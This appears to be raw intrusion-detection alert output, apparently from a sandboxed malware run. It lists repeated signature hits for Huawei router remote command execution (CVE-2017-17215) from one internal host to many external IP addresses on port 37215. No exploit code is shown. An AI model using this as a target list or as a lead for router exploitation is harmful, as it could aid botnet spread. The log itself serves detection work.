                                            06/14/24-10:44:04.419813TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4054837215192.168.2.1441.138.13.191
                                            06/14/24-10:44:10.543017TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5666237215192.168.2.14197.64.218.110
                                            06/14/24-10:44:20.804004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5869437215192.168.2.1441.253.98.141
                                            06/14/24-10:43:56.230879TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5200437215192.168.2.14197.232.5.220
                                            06/14/24-10:43:54.186180TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4288837215192.168.2.1441.108.114.82
                                            06/14/24-10:43:48.018143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4551237215192.168.2.14197.40.33.89
                                            06/14/24-10:44:12.644074TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3526637215192.168.2.14197.71.200.23
                                            06/14/24-10:44:20.807518TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5258637215192.168.2.1441.146.88.115
                                            06/14/24-10:44:06.470857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5181837215192.168.2.1441.251.10.220
                                            06/14/24-10:44:04.405067TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5832837215192.168.2.14156.53.209.127
                                            06/14/24-10:43:58.277000TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4278437215192.168.2.14156.179.142.22
                                            06/14/24-10:44:24.918036TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6039037215192.168.2.14156.198.56.155
                                            06/14/24-10:43:52.145564TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5403837215192.168.2.14156.141.61.170
                                            06/14/24-10:43:48.020252TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4466637215192.168.2.1441.192.245.207
                                            06/14/24-10:44:00.342703TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5357437215192.168.2.14197.197.220.151
                                            06/14/24-10:43:48.019557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6047037215192.168.2.1441.18.123.158
                                            06/14/24-10:43:58.290249TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4271237215192.168.2.1441.216.198.50
                                            06/14/24-10:43:45.984483TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3747837215192.168.2.14197.148.87.14
                                            06/14/24-10:44:29.013377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5641437215192.168.2.14156.245.7.232
                                            06/14/24-10:43:56.243037TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4053837215192.168.2.14197.109.42.35
                                            06/14/24-10:43:56.246406TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5867037215192.168.2.14197.198.170.76
                                            06/14/24-10:44:22.861318TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5883637215192.168.2.14156.148.168.254
                                            06/14/24-10:44:31.092814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5284437215192.168.2.14197.35.111.134
                                            06/14/24-10:44:04.409656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5935837215192.168.2.14156.33.141.64
                                            06/14/24-10:43:48.016696TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3763637215192.168.2.14197.156.223.231
                                            06/14/24-10:44:22.881434TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5267437215192.168.2.14156.139.225.229
                                            06/14/24-10:44:22.877577TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5272437215192.168.2.1441.254.185.103
                                            06/14/24-10:44:10.545159TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3426837215192.168.2.14156.188.119.41
                                            06/14/24-10:43:36.703770TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4906637215192.168.2.1441.71.86.236
                                            06/14/24-10:44:00.337284TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4186037215192.168.2.14197.68.180.17
                                            06/14/24-10:44:18.777981TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4065237215192.168.2.14197.118.180.250
                                            06/14/24-10:44:33.151996TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4062437215192.168.2.14156.164.86.131
                                            06/14/24-10:43:43.971768TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5967037215192.168.2.1441.114.107.131
                                            06/14/24-10:43:50.115483TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4267637215192.168.2.14197.233.146.139
                                            06/14/24-10:44:31.057307TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5770437215192.168.2.14156.234.150.45
                                            06/14/24-10:44:20.805334TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3893437215192.168.2.1441.210.96.161
                                            06/14/24-10:44:22.859575TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3567837215192.168.2.1441.254.224.72
                                            06/14/24-10:44:35.181969TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3409837215192.168.2.14156.23.172.116
                                            06/14/24-10:44:08.501327TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3529437215192.168.2.14156.176.166.186
                                            06/14/24-10:44:22.879908TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5012037215192.168.2.1441.26.168.245
                                            06/14/24-10:43:43.969529TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3760037215192.168.2.1441.129.132.162
                                            06/14/24-10:44:16.717143TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5339837215192.168.2.1441.113.152.225
                                            06/14/24-10:43:45.992276TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4273037215192.168.2.14197.25.165.66
                                            06/14/24-10:44:31.051692TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5061037215192.168.2.14197.149.94.8
                                            06/14/24-10:44:06.469896TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5486437215192.168.2.1441.35.165.215
                                            06/14/24-10:44:33.134440TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4735437215192.168.2.1441.151.61.90
                                            06/14/24-10:44:08.503934TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5699437215192.168.2.14156.215.39.66
                                            06/14/24-10:43:52.164239TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5328037215192.168.2.14197.34.242.64
                                            06/14/24-10:43:43.943109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3742437215192.168.2.14156.69.106.80
                                            06/14/24-10:44:08.519232TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5737837215192.168.2.1441.31.72.225
                                            06/14/24-10:43:41.850710TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3563837215192.168.2.14197.160.183.210
                                            06/14/24-10:44:00.325538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4698237215192.168.2.1441.121.94.166
                                            06/14/24-10:43:56.229489TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5072237215192.168.2.1441.229.95.14
                                            06/14/24-10:43:36.726077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5445837215192.168.2.14156.255.194.141
                                            06/14/24-10:43:45.989916TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5901837215192.168.2.14197.25.125.181
                                            06/14/24-10:44:10.544628TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4644237215192.168.2.14156.200.138.15
                                            06/14/24-10:44:00.337790TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5680037215192.168.2.14197.121.229.254
                                            06/14/24-10:44:20.804639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3730637215192.168.2.1441.50.164.216
                                            06/14/24-10:44:29.023014TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4793837215192.168.2.1441.154.205.23
                                            06/14/24-10:44:33.133369TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4918437215192.168.2.14156.91.196.63
                                            06/14/24-10:43:34.661710TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5703437215192.168.2.14197.224.78.64
                                            06/14/24-10:44:26.978629TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5848237215192.168.2.14197.84.151.211
                                            06/14/24-10:43:54.185298TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4590837215192.168.2.1441.146.163.157
                                            06/14/24-10:43:50.112020TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4916837215192.168.2.1441.55.183.87
                                            06/14/24-10:44:20.831514TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4398437215192.168.2.14197.146.118.192
                                            06/14/24-10:43:43.943176TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5576637215192.168.2.14156.59.67.215
                                            06/14/24-10:43:34.660395TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4430837215192.168.2.14156.224.103.158
                                            06/14/24-10:44:33.134766TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5121437215192.168.2.1441.236.247.237
                                            06/14/24-10:44:33.133721TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4607837215192.168.2.14156.7.63.227
                                            06/14/24-10:43:34.663675TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4135837215192.168.2.1441.60.252.190
                                            06/14/24-10:43:34.678945TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3599837215192.168.2.14197.61.126.76
                                            06/14/24-10:43:50.111022TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3294837215192.168.2.1441.108.53.101
                                            06/14/24-10:43:36.700161TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3354837215192.168.2.14156.255.160.13
                                            06/14/24-10:44:10.567661TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5471637215192.168.2.14197.139.80.231
                                            06/14/24-10:44:12.624517TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5961237215192.168.2.14197.132.138.138
                                            06/14/24-10:44:14.689618TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3694237215192.168.2.1441.195.7.106
                                            06/14/24-10:43:50.111246TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4231237215192.168.2.14197.42.107.250
                                            06/14/24-10:44:26.979576TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5606837215192.168.2.1441.207.118.84
                                            06/14/24-10:43:56.228328TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4806637215192.168.2.1441.239.21.11
                                            06/14/24-10:43:48.032361TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5318637215192.168.2.14197.160.233.109
                                            06/14/24-10:43:58.290704TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4313837215192.168.2.14197.120.95.226
                                            06/14/24-10:43:52.163978TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5926437215192.168.2.14156.184.166.74
                                            06/14/24-10:43:52.160634TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5459437215192.168.2.14156.34.241.32
                                            06/14/24-10:44:02.366111TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5640437215192.168.2.1441.4.113.183
                                            06/14/24-10:44:06.449731TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4496437215192.168.2.14156.153.15.225
                                            06/14/24-10:43:36.718414TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5238037215192.168.2.14197.176.87.234
                                            06/14/24-10:44:18.763004TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3453437215192.168.2.14197.17.240.117
                                            06/14/24-10:43:48.020828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5867637215192.168.2.14156.231.213.36
                                            06/14/24-10:44:02.381026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4746437215192.168.2.1441.0.248.255
                                            06/14/24-10:44:14.683937TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3900637215192.168.2.14197.156.1.158
                                            06/14/24-10:43:58.288988TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4354237215192.168.2.14197.102.184.113
                                            06/14/24-10:44:00.339574TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5374637215192.168.2.14156.30.30.252
                                            06/14/24-10:44:29.023431TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5219637215192.168.2.1441.186.21.125
                                            06/14/24-10:44:10.546326TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3478037215192.168.2.14197.113.82.195
                                            06/14/24-10:44:14.669255TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5281837215192.168.2.14156.74.82.152
                                            06/14/24-10:44:35.181762TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4151637215192.168.2.14156.189.132.62
                                            06/14/24-10:43:48.033783TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4599237215192.168.2.14156.154.224.207
                                            06/14/24-10:44:18.777075TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5640837215192.168.2.14197.105.2.181
                                            06/14/24-10:44:20.807707TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5616437215192.168.2.14156.154.252.122
                                            06/14/24-10:44:33.134845TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4627637215192.168.2.1441.207.85.184
                                            06/14/24-10:44:02.382742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5390637215192.168.2.14197.37.108.181
                                            06/14/24-10:44:18.761881TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3435837215192.168.2.14197.249.106.137
                                            06/14/24-10:44:33.148260TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3507237215192.168.2.1441.112.88.179
                                            06/14/24-10:44:24.916946TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5732437215192.168.2.14156.58.59.247
                                            06/14/24-10:43:37.758982TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6004637215192.168.2.1441.208.88.155
                                            06/14/24-10:44:10.568643TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4374437215192.168.2.14156.92.79.35
                                            06/14/24-10:44:06.453086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4220037215192.168.2.14197.144.162.245
                                            06/14/24-10:43:58.274757TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5360637215192.168.2.14156.134.254.69
                                            06/14/24-10:44:04.408674TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6066437215192.168.2.1441.109.82.101
                                            06/14/24-10:44:29.025336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5024237215192.168.2.14156.58.110.209
                                            06/14/24-10:43:41.849250TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3590237215192.168.2.14156.53.174.60
                                            06/14/24-10:44:20.830868TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5017037215192.168.2.14156.189.152.57
                                            06/14/24-10:43:50.110926TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3465637215192.168.2.14197.197.211.124
                                            06/14/24-10:43:58.277363TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5259637215192.168.2.14197.16.131.76
                                            06/14/24-10:43:50.072803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5287037215192.168.2.1441.48.69.176
                                            06/14/24-10:44:10.564897TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3715637215192.168.2.1441.215.55.67
                                            06/14/24-10:43:43.969785TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4063037215192.168.2.14156.71.228.7
                                            06/14/24-10:43:54.185553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4597037215192.168.2.14197.7.231.94
                                            06/14/24-10:44:12.624978TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3715637215192.168.2.1441.170.187.34
                                            06/14/24-10:44:22.860532TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3934237215192.168.2.1441.121.209.49
                                            06/14/24-10:43:45.989512TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3832837215192.168.2.1441.184.209.78
                                            06/14/24-10:44:12.644562TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5358837215192.168.2.1441.92.83.53
                                            06/14/24-10:43:52.149745TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4815837215192.168.2.14156.8.127.160
                                            06/14/24-10:44:14.689316TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4731637215192.168.2.14156.5.87.106
                                            06/14/24-10:44:20.829579TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3326237215192.168.2.14156.138.77.57
                                            06/14/24-10:43:48.015791TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4074837215192.168.2.1441.157.92.98
                                            06/14/24-10:44:08.501263TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4277637215192.168.2.1441.197.173.172
                                            06/14/24-10:43:43.943137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5023837215192.168.2.14197.60.83.206
                                            06/14/24-10:43:56.228841TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5534437215192.168.2.14197.94.58.131
                                            06/14/24-10:43:41.899108TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4959037215192.168.2.1441.59.227.209
                                            06/14/24-10:44:16.717541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5017637215192.168.2.14156.79.138.128
                                            06/14/24-10:44:20.829935TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5788237215192.168.2.14197.30.248.27
                                            06/14/24-10:43:41.846899TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5765237215192.168.2.14156.99.116.246
                                            06/14/24-10:44:10.581942TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4539837215192.168.2.1441.39.72.141
                                            06/14/24-10:43:41.846197TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5768837215192.168.2.1441.201.39.196
                                            06/14/24-10:43:37.759491TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5955237215192.168.2.14156.180.201.104
                                            06/14/24-10:44:16.735947TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4706637215192.168.2.1441.9.190.46
                                            06/14/24-10:44:29.027645TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3533637215192.168.2.14156.150.37.239
                                            06/14/24-10:44:14.668740TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4514837215192.168.2.14156.25.239.32
                                            06/14/24-10:43:41.846422TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5682237215192.168.2.14197.81.94.253
                                            06/14/24-10:44:08.504953TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3972237215192.168.2.14197.220.10.204
                                            06/14/24-10:44:10.544230TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4643437215192.168.2.14156.47.48.36
                                            06/14/24-10:43:34.679469TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4223437215192.168.2.1441.180.19.47
                                            06/14/24-10:43:43.942659TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5093637215192.168.2.14156.192.230.215
                                            06/14/24-10:43:45.989654TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5743437215192.168.2.14156.5.113.85
                                            06/14/24-10:43:48.018982TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3327637215192.168.2.14197.153.95.152
                                            06/14/24-10:44:04.419106TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5422637215192.168.2.1441.21.33.25
                                            06/14/24-10:44:00.323712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3535237215192.168.2.14197.65.25.206
                                            06/14/24-10:43:41.902485TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3369237215192.168.2.1441.27.192.97
                                            06/14/24-10:44:33.151109TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4928237215192.168.2.14156.255.95.187
                                            06/14/24-10:43:37.762156TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5348437215192.168.2.14156.216.202.200
                                            06/14/24-10:43:52.145995TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3652237215192.168.2.14156.68.231.23
                                            06/14/24-10:43:52.146025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5887037215192.168.2.14156.200.15.122
                                            06/14/24-10:44:14.683898TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5623437215192.168.2.1441.13.224.61
                                            06/14/24-10:44:00.340144TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4614237215192.168.2.14197.83.42.101
                                            06/14/24-10:43:43.971743TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4625637215192.168.2.1441.105.216.230
                                            06/14/24-10:44:24.944438TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3343837215192.168.2.14156.31.107.253
                                            06/14/24-10:44:02.383090TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5351237215192.168.2.14197.120.161.58
                                            06/14/24-10:43:58.276083TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5383837215192.168.2.14197.243.168.206
                                            06/14/24-10:43:39.791084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5181637215192.168.2.1441.3.0.148
                                            06/14/24-10:43:56.230571TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3597437215192.168.2.1441.28.161.243
                                            06/14/24-10:43:45.965954TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3541237215192.168.2.14156.63.37.173
                                            06/14/24-10:44:18.763079TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5533437215192.168.2.14156.45.209.143
                                            06/14/24-10:44:00.344137TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4180237215192.168.2.14156.207.102.253
                                            06/14/24-10:44:22.882040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5625237215192.168.2.14197.200.163.163
                                            06/14/24-10:43:50.074708TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5933037215192.168.2.1441.210.152.93
                                            06/14/24-10:43:52.145933TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5547437215192.168.2.1441.176.178.117
                                            06/14/24-10:43:37.763393TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5833637215192.168.2.14156.238.39.7
                                            06/14/24-10:44:16.718289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4951237215192.168.2.14197.149.93.25
                                            06/14/24-10:44:12.644283TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6068037215192.168.2.1441.17.34.113
                                            06/14/24-10:43:54.199056TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5833237215192.168.2.14197.79.111.137
                                            06/14/24-10:44:29.014060TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3457237215192.168.2.14156.201.107.167
                                            06/14/24-10:43:58.275002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4499837215192.168.2.14197.89.180.190
                                            06/14/24-10:44:29.025460TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4958837215192.168.2.14197.167.182.137
                                            06/14/24-10:44:33.150066TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5969237215192.168.2.14197.230.42.43
                                            06/14/24-10:44:06.451543TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5222637215192.168.2.1441.122.59.156
                                            06/14/24-10:44:26.984898TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5473037215192.168.2.1441.156.206.185
                                            06/14/24-10:43:52.160215TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4893037215192.168.2.1441.208.178.233
                                            06/14/24-10:44:18.774833TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5793437215192.168.2.1441.176.99.145
                                            06/14/24-10:44:06.450950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5010037215192.168.2.1441.48.145.225
                                            06/14/24-10:44:12.614040TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5909037215192.168.2.14197.223.159.80
                                            06/14/24-10:44:22.880201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4374437215192.168.2.14156.148.240.203
                                            06/14/24-10:43:56.242864TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5682237215192.168.2.1441.124.206.56
                                            06/14/24-10:44:04.420611TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5727637215192.168.2.14156.224.116.191
                                            06/14/24-10:44:06.452286TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4177237215192.168.2.14197.233.3.74
                                            06/14/24-10:43:56.230225TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5201037215192.168.2.1441.117.136.42
                                            06/14/24-10:44:06.453256TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4001237215192.168.2.14197.49.215.54
                                            06/14/24-10:43:39.807896TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3294237215192.168.2.1441.145.86.18
                                            06/14/24-10:43:34.663855TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4668837215192.168.2.14156.146.20.194
